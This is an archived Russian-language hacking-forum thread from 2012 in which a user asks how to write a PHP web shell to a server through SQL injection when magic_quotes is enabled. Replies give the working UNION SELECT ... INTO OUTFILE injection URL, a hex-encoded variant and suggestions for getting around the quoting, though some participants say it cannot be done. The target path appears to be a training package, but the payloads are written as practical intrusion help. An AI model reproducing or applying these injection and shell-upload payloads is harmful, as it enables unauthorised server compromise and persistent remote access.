ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |

27.03.2012, 18:07
|
|
Новичок
Регистрация: 09.02.2012
Сообщений: 0
Провел на форуме: 0
Репутация:
0
|
|
Всем привет. Столкнулся с такой проблемой. Хочу залить шелл, но на сайте включен magic_quotes. То есть выполнить такой запрос я не могу
http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0X3C707
,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'
Кто знает как решить проблему?
|
|
|

27.03.2012, 18:08
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме: 262707
Репутация:
935
|
|
Никак.
|
|
|

27.03.2012, 18:11
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме: 290351
Репутация:
173
|
|
твой запрос
Сообщение от None
http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0X3C707
,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'
в него встраиваем внутренний запрос
Сообщение от None
-1 union select 0X3C707
,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'
только в хексе
Сообщение от None
0x2d3120756e696f6e2073656c656374203058334337303720 2c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466 696c6520277573722f6c6f63616c2f6170616368652f687464 6f63732f7765626578706c6f69746174696f6e5f7061636b61 67655f30322f20637970686f722f7368656c6c2e706870
и должно быть что то вроде
http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0x2d3120756e696f6e2073656c656374203058334337303720 2c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466 696c6520277573722f6c6f63616c2f6170616368652f687464 6f63732f7765626578706c6f69746174696f6e5f7061636b61 67655f30322f20637970686f722f7368656c6c2e706870,nul l,null,null--
Вроде так можно
|
|
|

27.03.2012, 18:25
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме: 262707
Репутация:
935
|
|
Аннет, всётаки так нельзя, вложенный запрос не обработается, т.к. это не предусмотрено исполняемым скриптом, если опираться на первый пост.
|
|
|

27.03.2012, 18:34
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме: 290351
Репутация:
173
|
|
Expl0ited это из-за хекса нельзя, который у него в первом посте? или изза "null"?
|
|
|

27.03.2012, 18:42
|
|
Новичок
Регистрация: 09.02.2012
Сообщений: 0
Провел на форуме: 0
Репутация:
0
|
|
Сообщение от OxoTnik
твой запрос
в него встраиваем внутренний запрос
только в хексе
и должно быть что то вроде
http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0x2d3120756e696f6e2073656c656374203058334337303720 2c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466 696c6520277573722f6c6f63616c2f6170616368652f687464 6f63732f7765626578706c6f69746174696f6e5f7061636b61 67655f30322f20637970686f722f7368656c6c2e706870,nul l,null,null--
Вроде так можно
OxoTnik,не выходит. Когда делаю внутренний запрос (в хекс), то он воспринимается как строка, а не как запрос. Искал возможность через сохраненные процедуры, но тоже решения пока не нашел. Есть ли другие предложения?
|
|
|

28.03.2012, 21:50
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме: 102354
Репутация:
267
|
|
Сообщение от OxoTnik
Expl0ited
это из-за хекса нельзя, который у него в первом посте? или изза "null"?
Путь юзать в хексе нельзя.
TC, ответ дали же. НИКАК.
|
|
|

13.04.2012, 11:05
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме: 97332
Репутация:
38
|
|
Можно обойти, при условие, что запрос передается через переменную в другой запрос.
Точда кодируем в хекс и во втором запросе кавычки выполнятся нормально
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|